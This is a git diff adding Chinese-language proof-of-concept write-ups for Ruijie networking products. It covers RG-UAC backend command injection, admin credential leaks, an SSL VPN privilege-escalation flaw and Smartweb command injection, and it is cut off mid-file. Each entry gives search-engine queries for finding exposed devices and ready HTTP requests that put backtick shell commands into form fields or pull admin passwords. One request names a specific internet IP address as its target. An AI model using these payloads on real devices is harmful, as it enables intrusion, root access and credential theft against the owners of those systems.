+POST /view/networkConfig/GRE/gre_edit.php HTTP/1.1
+Host: 
+Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Content-Length: 17
+
+name=`pwd+>1.txt`
+```
+
+![1714985931696-3bd8e43e-817b-4b7f-b9b1-7f3664b0a1c6.png](./img/wf8C3DaCBPoqZ1fi/1714985931696-3bd8e43e-817b-4b7f-b9b1-7f3664b0a1c6-200127.png)
+
+```plain
+/view/networkConfig/GRE/1.txt
+```
+
+![1714986112359-00f98557-ca7c-4184-b5be-8717fce28791.png](./img/wf8C3DaCBPoqZ1fi/1714986112359-00f98557-ca7c-4184-b5be-8717fce28791-931665.png)
+
+
+
+> 更新: 2024-06-24 11:42:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yig773u39hvi17q6>
\ No newline at end of file
diff --git a/锐捷RG-UAC统一上网行为管理审计系统interface_commit后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统interface_commit后台命令执行漏洞.md
new file mode 100644
index 0000000..135d095
--- /dev/null
+++ b/锐捷RG-UAC统一上网行为管理审计系统interface_commit后台命令执行漏洞.md
@@ -0,0 +1,43 @@
+# 锐捷RG-UAC统一上网行为管理审计系统interface_commit后台命令执行漏洞
+
+# 一、漏洞简介
+锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。
+
+# 二、影响版本
++ 锐捷RG-UAC统一上网行为管理审计系统
+
+# 三、资产测绘
++ hunter`app.name="Ruijie 锐捷 RG-UAC"`
++ fofoa:`app="Ruijie-RG-UAC"`
+
+登录页
+
+![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/7GS4i25yp901yTrJ/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-355914.png)
+
+# 四、漏洞复现
+使用弱口令/敏感信息泄露漏洞登录系统后台
+
+![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/7GS4i25yp901yTrJ/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-531206.png)
+
+获取Cookie后使用下面poc
+
+```plain
+GET /view/networkConfig/physicalInterface/interface_commit.php?name=`id+>1.txt` HTTP/1.1
+Host: 183.230.22.108:4443
+Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+```
+
+![1714987361587-af66e872-c696-4185-a646-d394c9950b5d.png](./img/7GS4i25yp901yTrJ/1714987361587-af66e872-c696-4185-a646-d394c9950b5d-066130.png)
+
+```plain
+/view/networkConfig/physicalInterface/1.txt
+```
+
+![1714987618903-d101e763-9815-4ca3-847c-11797e46adc3.png](./img/7GS4i25yp901yTrJ/1714987618903-d101e763-9815-4ca3-847c-11797e46adc3-056117.png)
+
+
+
+> 更新: 2024-06-24 11:42:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aya1yceayqpleil4>
\ No newline at end of file
diff --git a/锐捷RG-UAC统一上网行为管理审计系统ip_addr_add_commit后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统ip_addr_add_commit后台命令执行漏洞.md
new file mode 100644
index 0000000..de1c02e
--- /dev/null
+++ b/锐捷RG-UAC统一上网行为管理审计系统ip_addr_add_commit后台命令执行漏洞.md
@@ -0,0 +1,47 @@
+# 锐捷RG-UAC统一上网行为管理审计系统ip_addr_add_commit后台命令执行漏洞
+
+# 一、漏洞简介
+锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。
+
+# 二、影响版本
++ 锐捷RG-UAC统一上网行为管理审计系统
+
+# 三、资产测绘
++ hunter`app.name="Ruijie 锐捷 RG-UAC"`
++ fofoa:`app="Ruijie-RG-UAC"`
+
+登录页
+
+![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/MjJVTdoURakqdq8S/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-593129.png)
+
+# 四、漏洞复现
+使用弱口令/敏感信息泄露漏洞登录系统后台
+
+![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/MjJVTdoURakqdq8S/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-993540.png)
+
+获取Cookie后使用下面poc
+
+```plain
+POST /view/networkConfig/IPConfig/ip_addr_add_commit.php HTTP/1.1
+Host: 
+Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Content-Length: 49
+
+text_ip_addr=`ls+>1.txt`&convert_mask=1&ethname=1
+```
+
+![1714986202461-e530da3e-9b79-43be-8e4c-805a91ed6016.png](./img/MjJVTdoURakqdq8S/1714986202461-e530da3e-9b79-43be-8e4c-805a91ed6016-785612.png)
+
+```plain
+/view/networkConfig/IPConfig/1.txt
+```
+
+![1714986238647-4c29726d-77d6-47f4-9a8c-fc144f5ca2dd.png](./img/MjJVTdoURakqdq8S/1714986238647-4c29726d-77d6-47f4-9a8c-fc144f5ca2dd-853295.png)
+
+
+
+> 更新: 2024-06-24 11:42:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rwv0bwp1olbcnfw4>
\ No newline at end of file
diff --git a/锐捷RG-UAC统一上网行为管理审计系统oldipmask后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统oldipmask后台命令执行漏洞.md
new file mode 100644
index 0000000..10c3c3d
--- /dev/null
+++ b/锐捷RG-UAC统一上网行为管理审计系统oldipmask后台命令执行漏洞.md
@@ -0,0 +1,47 @@
+# 锐捷RG-UAC统一上网行为管理审计系统oldipmask后台命令执行漏洞
+
+# 一、漏洞简介
+锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。
+
+# 二、影响版本
++ 锐捷RG-UAC统一上网行为管理审计系统
+
+# 三、资产测绘
++ hunter`app.name="Ruijie 锐捷 RG-UAC"`
++ fofoa:`app="Ruijie-RG-UAC"`
+
+登录页
+
+![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/JaY0nGqm7djX0Trs/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-655255.png)
+
+# 四、漏洞复现
+使用弱口令/敏感信息泄露漏洞登录系统后台
+
+![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/JaY0nGqm7djX0Trs/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-440417.png)
+
+获取Cookie后使用下面poc
+
+```plain
+POST /view/networkConfig/RouteConfig/nmc_StaticRoute/static_route_edit_ipv6.php?action=modify HTTP/1.1
+Host: 
+Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Content-Length: 68
+
+text_ip_addr=0000:0000:0000::0000&oldipmask=`ls+>1.txt`&oldgateway=1
+```
+
+![1714986746439-82767a50-8b67-4480-8517-a215d3ab8209.png](./img/JaY0nGqm7djX0Trs/1714986746439-82767a50-8b67-4480-8517-a215d3ab8209-727540.png)
+
+```plain
+/view/networkConfig/RouteConfig/nmc_StaticRoute/1.txt
+```
+
+![1714986728793-b60dd937-d634-4e87-83e8-6c03b4b983ae.png](./img/JaY0nGqm7djX0Trs/1714986728793-b60dd937-d634-4e87-83e8-6c03b4b983ae-380319.png)
+
+
+
+> 更新: 2024-06-24 11:42:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rztq3930oo8129ns>
\ No newline at end of file
diff --git a/锐捷RG-UAC统一上网行为管理审计系统static_route_edit_commit后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统static_route_edit_commit后台命令执行漏洞.md
new file mode 100644
index 0000000..ff4df94
--- /dev/null
+++ b/锐捷RG-UAC统一上网行为管理审计系统static_route_edit_commit后台命令执行漏洞.md
@@ -0,0 +1,47 @@
+# 锐捷RG-UAC统一上网行为管理审计系统static_route_edit_commit后台命令执行漏洞
+
+# 一、漏洞简介
+锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。
+
+# 二、影响版本
++ 锐捷RG-UAC统一上网行为管理审计系统
+
+# 三、资产测绘
++ hunter`app.name="Ruijie 锐捷 RG-UAC"`
++ fofoa:`app="Ruijie-RG-UAC"`
+
+登录页
+
+![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/hNTRdQmi80Q2G_y-/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-873588.png)
+
+# 四、漏洞复现
+使用弱口令/敏感信息泄露漏洞登录系统后台
+
+![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/hNTRdQmi80Q2G_y-/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-395822.png)
+
+获取Cookie后使用下面poc
+
+```plain
+POST /view/networkConfig/RouteConfig/StaticRoute/static_route_edit_commit.php HTTP/1.1
+Host: 
+Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Content-Length: 38
+
+oldipmask=`whoami+>2.txt`&oldgateway=1
+```
+
+![1714988328133-0b51fb46-5b51-4180-aad5-e38c2e83238b.png](./img/hNTRdQmi80Q2G_y-/1714988328133-0b51fb46-5b51-4180-aad5-e38c2e83238b-920825.png)
+
+```plain
+/view/networkConfig/RouteConfig/StaticRoute/2.txt
+```
+
+![1714988388622-fd76d5eb-c811-43f4-934d-5fccccc26b86.png](./img/hNTRdQmi80Q2G_y-/1714988388622-fd76d5eb-c811-43f4-934d-5fccccc26b86-222879.png)
+
+
+
+> 更新: 2024-06-24 11:42:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vfp68n948gq7g8u6>
\ No newline at end of file
diff --git a/锐捷RG-UAC统一上网行为管理审计系统text_ip_addr后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统text_ip_addr后台命令执行漏洞.md
new file mode 100644
index 0000000..cea1bec
--- /dev/null
+++ b/锐捷RG-UAC统一上网行为管理审计系统text_ip_addr后台命令执行漏洞.md
@@ -0,0 +1,47 @@
+# 锐捷RG-UAC统一上网行为管理审计系统text_ip_addr后台命令执行漏洞
+
+# 一、漏洞简介
+锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。
+
+# 二、影响版本
++ 锐捷RG-UAC统一上网行为管理审计系统
+
+# 三、资产测绘
++ hunter`app.name="Ruijie 锐捷 RG-UAC"`
++ fofoa:`app="Ruijie-RG-UAC"`
+
+登录页
+
+![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/-36EvUu87to55yNJ/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-173464.png)
+
+# 四、漏洞复现
+使用弱口令/敏感信息泄露漏洞登录系统后台
+
+![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/-36EvUu87to55yNJ/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-614323.png)
+
+获取Cookie后使用下面poc
+
+```plain
+POST /view/networkConfig/IPConfig/ip_addr_edit_commit.php HTTP/1.1
+Host: 
+Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Content-Length: 48
+
+text_ip_addr=`whoami+>1.txt`&newmask=1&orgname=1
+```
+
+![1714987076862-fe1d19bd-7d16-41b7-bfc2-2ec74230b320.png](./img/-36EvUu87to55yNJ/1714987076862-fe1d19bd-7d16-41b7-bfc2-2ec74230b320-670307.png)
+
+```plain
+/view/networkConfig/IPConfig/1.txt
+```
+
+![1714987102310-5513bac3-2709-46e8-b180-02675667a5e1.png](./img/-36EvUu87to55yNJ/1714987102310-5513bac3-2709-46e8-b180-02675667a5e1-871889.png)
+
+
+
+> 更新: 2024-06-24 11:42:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zivmo2zapknqqda3>
\ No newline at end of file
diff --git a/锐捷RG-UAC统一上网行为管理审计系统text_prefixlen后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统text_prefixlen后台命令执行漏洞.md
new file mode 100644
index 0000000..f1d68ef
--- /dev/null
+++ b/锐捷RG-UAC统一上网行为管理审计系统text_prefixlen后台命令执行漏洞.md
@@ -0,0 +1,47 @@
+# 锐捷RG-UAC统一上网行为管理审计系统text_prefixlen后台命令执行漏洞
+
+# 一、漏洞简介
+锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。
+
+# 二、影响版本
++ 锐捷RG-UAC统一上网行为管理审计系统
+
+# 三、资产测绘
++ hunter`app.name="Ruijie 锐捷 RG-UAC"`
++ fofoa:`app="Ruijie-RG-UAC"`
+
+登录页
+
+![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/19dwJ1XCwS9pynNa/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-002349.png)
+
+# 四、漏洞复现
+使用弱口令/敏感信息泄露漏洞登录系统后台
+
+![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/19dwJ1XCwS9pynNa/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-943780.png)
+
+获取Cookie后使用下面poc
+
+```plain
+POST /view/networkConfig/RouteConfig/StaticRoute/static_route_add_ipv6.php HTTP/1.1
+Host: 
+Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Content-Length: 75
+
+text_ip_addr=0000:0000:0000::0000&text_prefixlen=`ls+>1.txt`&text_gateway=1
+```
+
+![1714986473370-9947d45b-a038-4c40-bd35-887ec9be4e2c.png](./img/19dwJ1XCwS9pynNa/1714986473370-9947d45b-a038-4c40-bd35-887ec9be4e2c-905624.png)
+
+```plain
+/view/networkConfig/RouteConfig/StaticRoute/1.txt
+```
+
+![1714986484395-a1332920-5e93-49c7-9edd-aee6c39718e3.png](./img/19dwJ1XCwS9pynNa/1714986484395-a1332920-5e93-49c7-9edd-aee6c39718e3-180098.png)
+
+
+
+> 更新: 2024-06-24 11:42:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/knbwbbtehaqo6gv1>
\ No newline at end of file
diff --git a/锐捷RG-UAC统一上网行为管理审计系统信息泄漏漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统信息泄漏漏洞.md
new file mode 100644
index 0000000..0f06d69
--- /dev/null
+++ b/锐捷RG-UAC统一上网行为管理审计系统信息泄漏漏洞.md
@@ -0,0 +1,23 @@
+# 锐捷RG-UAC统一上网行为管理审计系统信息泄漏漏洞
+
+# 一、漏洞简介
+锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台 。
+
+# 二、影响版本
++ 锐捷RG-UAC统一上网行为管理审计系统
+
+# 三、资产测绘
++ hunter`app.name="Ruijie 锐捷 RG-UAC"`
++ 登录页面
+
+![1694194776421-ba24eefd-0902-408f-9b39-94df05de40a6.png](./img/kHsNEDmJ-KmEi_RV/1694194776421-ba24eefd-0902-408f-9b39-94df05de40a6-091037.png)
+
+# 四、漏洞复现
+1. `F12`搜索`super_admin`字段，发现`admin`账户和密码
+
+![1694194847217-acaed4bc-eda4-4fae-a5ad-873559bc1694.png](./img/kHsNEDmJ-KmEi_RV/1694194847217-acaed4bc-eda4-4fae-a5ad-873559bc1694-341213.png)
+
+
+
+> 更新: 2024-06-24 11:42:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vphzyvniletxc028>
\ No newline at end of file
diff --git a/锐捷RG-UAC统一上网行为管理审计系统账号密码泄漏漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统账号密码泄漏漏洞.md
new file mode 100644
index 0000000..9b2fe6f
--- /dev/null
+++ b/锐捷RG-UAC统一上网行为管理审计系统账号密码泄漏漏洞.md
@@ -0,0 +1,29 @@
+# 锐捷RG-UAC统一上网行为管理审计系统账号密码泄漏漏洞
+
+# 一、漏洞简介
+锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台 。
+
+# 二、影响版本
++ 锐捷RG-UAC统一上网行为管理审计系统
+
+# 三、资产测绘
++ hunter`app.name="Ruijie 锐捷 RG-UAC"`
++ fofoa:`app="Ruijie-RG-UAC"`
+
+登录页
+
+![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/PWRvl7dZB_p9dP8f/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-803916.png)
+
+# 四、漏洞复现
+```plain
+/get_dkey.php?user=admin
+```
+
+![1711942654983-81767f2d-af9a-4c55-a6bf-54ccc7d257aa.png](./img/PWRvl7dZB_p9dP8f/1711942654983-81767f2d-af9a-4c55-a6bf-54ccc7d257aa-619723.png)
+
+![1711942773077-d328619f-9fe1-49f8-88bb-da5a39b5859e.png](./img/PWRvl7dZB_p9dP8f/1711942773077-d328619f-9fe1-49f8-88bb-da5a39b5859e-257062.png)
+
+
+
+> 更新: 2024-06-24 11:42:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vfv3tndznm6x0igq>
\ No newline at end of file
diff --git a/锐捷RGSSLVPN垂直越权漏洞.md b/锐捷RGSSLVPN垂直越权漏洞.md
new file mode 100644
index 0000000..4a10d94
--- /dev/null
+++ b/锐捷RGSSLVPN垂直越权漏洞.md
@@ -0,0 +1,70 @@
+# 锐捷RG SSL VPN 垂直越权漏洞
+
+**一、漏洞简介**
+
+Ruijie SSL VPN 存在越权访问漏洞，攻击者在已知用户名的情况下，可以对账号进行修改密码和绑定手机的操作。并在未授权的情况下查看服务器资源
+
+**二、影响版本**  
+锐捷RG SSL VPN  
+**三、资产测绘**
+
+fofa`icon_hash="884334722" || title="Ruijie SSL VPN"`  
+●登录页面![1716003142340-e37abdfb-2331-46bd-9184-8f06ccc163f8.png](./img/rnV_dT0P-F2gQ0uU/1716003142340-e37abdfb-2331-46bd-9184-8f06ccc163f8-202983.png)
+
+  
+**四、漏洞复现**
+
+```plain
+/cgi-bin/main.cgi?oper=getrsc
+```
+
+直接访问，回显如下：
+
+![1716002869509-8022ac2f-2774-470e-a9a5-c0a6eddcb6e4.png](./img/rnV_dT0P-F2gQ0uU/1716002869509-8022ac2f-2774-470e-a9a5-c0a6eddcb6e4-567977.png)
+
+随后访问如下，UserName 参数为已知用户名 在未知登录用户名的情况下 漏洞无法利用(根据请求包使用Burp进行用户名爆破)
+
+```plain
+/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=name&sid=1614345312&oper=showres
+```
+
+![1716003540683-111e6aa4-2326-44c7-bfaf-ac707445a34b.png](./img/rnV_dT0P-F2gQ0uU/1716003540683-111e6aa4-2326-44c7-bfaf-ac707445a34b-026112.png)
+
+<font style="color:rgb(0, 0, 0);">查看服务器资源</font><font style="color:rgba(0, 0, 0, 0.9);">POC：</font>
+
+```plain
+GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1
+Host: 127.0.0.1
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
+Cookie: UserName=name; SessionId=1; FirstVist=1; Skin=1; tunnel=1
+```
+
+![1716003718786-1772a9c9-e1e3-4d28-b214-4a3f675b8f85.png](./img/rnV_dT0P-F2gQ0uU/1716003718786-1772a9c9-e1e3-4d28-b214-4a3f675b8f85-584396.png)
+
+通过此方法知道用户名后可以通过漏洞修改账号参数，访问
+
+```plain
+/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=liuw&sid=1&oper=showres
+```
+
+![1716003925237-08d888f1-6d4f-4ff1-b393-80e22421595c.png](./img/rnV_dT0P-F2gQ0uU/1716003925237-08d888f1-6d4f-4ff1-b393-80e22421595c-256764.png)
+
+点击个人设置跳转页面即可修改账号信息
+
+![1716003942414-7766703a-9795-4795-8397-40b3ed33cfa1.png](./img/rnV_dT0P-F2gQ0uU/1716003942414-7766703a-9795-4795-8397-40b3ed33cfa1-770431.png)
+
+
+
+> 更新: 2024-06-24 11:42:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tmgs3g967ixmiwam>
\ No newline at end of file
diff --git a/锐捷Smartweb管理系统命令注入漏洞.md b/锐捷Smartweb管理系统命令注入漏洞.md
new file mode 100644
index 0000000..45433eb
--- /dev/null
+++ b/锐捷Smartweb管理系统命令注入漏洞.md
@@ -0,0 +1,65 @@
+# 锐捷 Smartweb管理系统 命令注入漏洞
+
+# 一、漏洞描述
+锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷Smartweb系统存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，导致服务器失陷。
+
+# 二、影响版本
++ 锐捷网络股份有限公司 无线smartweb管理系统
+
+# 三、资产测绘
+```java
+hunterapp.name="Ruijie 锐捷 Smartweb"
+fofa：title="无线smartWeb--登录页面"
+```
+
++ 登录页面
+
+![1693026690199-64fbe35e-4db9-4483-9ff4-60fd93531a2c.png](./img/tBfsUhE5mcdw2hI_/1693026690199-64fbe35e-4db9-4483-9ff4-60fd93531a2c-041676.png)
+
+<font style="color:rgb(34, 34, 34);">1.执行查看用户名和密码POC，show webmaster users得到回显</font>
+
+```plain
+POST /WEB_VMS/LEVEL15/ HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+Content-Length: 81
+DNT: 1
+Connection: close
+Cookie: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302
+
+command=show webmaster users&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
+```
+
+![1710773613327-d46e7ef8-c09c-4f7d-8b63-03f19fec9789.png](./img/tBfsUhE5mcdw2hI_/1710773613327-d46e7ef8-c09c-4f7d-8b63-03f19fec9789-719275.png)
+
+base64解码后登录系统
+
+![1710773670682-afc5a16e-fac1-4963-b723-b5b09ab69f6c.png](./img/tBfsUhE5mcdw2hI_/1710773670682-afc5a16e-fac1-4963-b723-b5b09ab69f6c-380750.png)
+
+<font style="color:rgb(34, 34, 34);">可执行其它命令</font>
+
+```plain
+show running-config       查看当前生效的配置信息
+show interface fastethernet 0/3   查看F0/3端口信息
+show interface serial 1/2       查看S1/2端口信息
+show interface                查看所有端口信息
+show ip interface brief          以简洁方式汇总查看所有端口信息
+show ip interface         查看所有端口信息
+show version               查看版本信息
+
+锐捷交换机命令参考：
+https://www.bilibili.com/read/cv12330628
+```
+
+![1710773800917-a83c0375-e631-4ae2-a877-a5ae979a7d3b.png](./img/tBfsUhE5mcdw2hI_/1710773800917-a83c0375-e631-4ae2-a877-a5ae979a7d3b-014295.png)
+
+
+
+> 更新: 2024-06-24 11:42:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cdukm3k8snxldkns>
\ No newline at end of file
diff --git a/锐捷Smartweb管理系统密码信息泄漏漏洞.md b/锐捷Smartweb管理系统密码信息泄漏漏洞.md
new file mode 100644
index 0000000..52c646e
--- /dev/null
+++ b/锐捷Smartweb管理系统密码信息泄漏漏洞.md
@@ -0,0 +1,39 @@
+# 锐捷 Smartweb管理系统密码信息泄漏漏洞
+
+# 一、漏洞描述
+锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞，攻击者可从漏洞获取到管理员账号密码，从而以管理员权限登录。
+
+# 二、影响版本
++ 锐捷网络股份有限公司 无线smartweb管理系统
+
+# 三、资产测绘
++ hunter`app.name="Ruijie 锐捷 Smartweb"`
++ 登录页面
+
+![1693026690199-64fbe35e-4db9-4483-9ff4-60fd93531a2c.png](./img/oFjWwQcPR9lcz4hK/1693026690199-64fbe35e-4db9-4483-9ff4-60fd93531a2c-137226.png)
+
+# 四、漏洞复现
+1. 使用默认口令`guest/guest`登录系统
+
+![1693026732018-95d1a5fe-3731-47f8-8189-98cdf821d914.png](./img/oFjWwQcPR9lcz4hK/1693026732018-95d1a5fe-3731-47f8-8189-98cdf821d914-202998.png)
+
+2. 使用poc获取管理员`admin`账号密码
+
+```plain
+http://xx.xx.xx.xx/web/xml/webuser-auth.xml
+```
+
+![1693026854163-84e6635e-5d9e-4385-8fa9-f31a26f91988.png](./img/oFjWwQcPR9lcz4hK/1693026854163-84e6635e-5d9e-4385-8fa9-f31a26f91988-063470.png)
+
+3. base64解码后获取账号密码
+
+![1693026884669-f6bba353-350f-48bc-b932-424eb8363d40.png](./img/oFjWwQcPR9lcz4hK/1693026884669-f6bba353-350f-48bc-b932-424eb8363d40-016540.png)
+
+4. 使用获取的管理账号admin登录系统
+
+![1693026933284-ae25c0ab-b1fb-448a-8f3b-60bd2c8b9798.png](./img/oFjWwQcPR9lcz4hK/1693026933284-ae25c0ab-b1fb-448a-8f3b-60bd2c8b9798-589008.png)
+
+
+
+> 更新: 2024-06-24 11:42:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/elegkbnby3vipdi9>
\ No newline at end of file
diff --git a/锐捷Smartweb管理系统密码信息泄露漏洞CNVD-2021-17369.md b/锐捷Smartweb管理系统密码信息泄露漏洞CNVD-2021-17369.md
new file mode 100644
index 0000000..3cbf941
--- /dev/null
+++ b/锐捷Smartweb管理系统密码信息泄露漏洞CNVD-2021-17369.md
@@ -0,0 +1,35 @@
+# 锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369
+
+**一、漏洞简介**  
+<font style="color:rgb(31, 35, 40);">锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞，攻击者可从漏洞获取到管理员账号密码，从而以管理员权限登录。</font>  
+**二、影响版本**  
+<font style="color:rgb(31, 35, 40);">锐捷网络股份有限公司 无线smartweb管理系统</font>  
+**<font style="color:rgb(31, 35, 40);">三、资产测绘</font>**  
+●hunterweb.body="img/free_login_ge.gif"&&web.body="./img/login_bg.gif"  
+●登录页面  
+
+
+![1693030700475-392f4913-2fd5-45e8-a33b-c5eb742be387.png](./img/-3rJ7WzmMGCuOLN8/1693030700475-392f4913-2fd5-45e8-a33b-c5eb742be387-027436.webp)
+
+  
+**四、漏洞复现**  
+<font style="color:rgb(31, 35, 40);">使用默认口令guest/guest登录系统</font>
+
+![1710772684782-0092c42f-f067-4e1b-a3ec-8f0c2ecd4567.png](./img/-3rJ7WzmMGCuOLN8/1710772684782-0092c42f-f067-4e1b-a3ec-8f0c2ecd4567-711528.png)
+
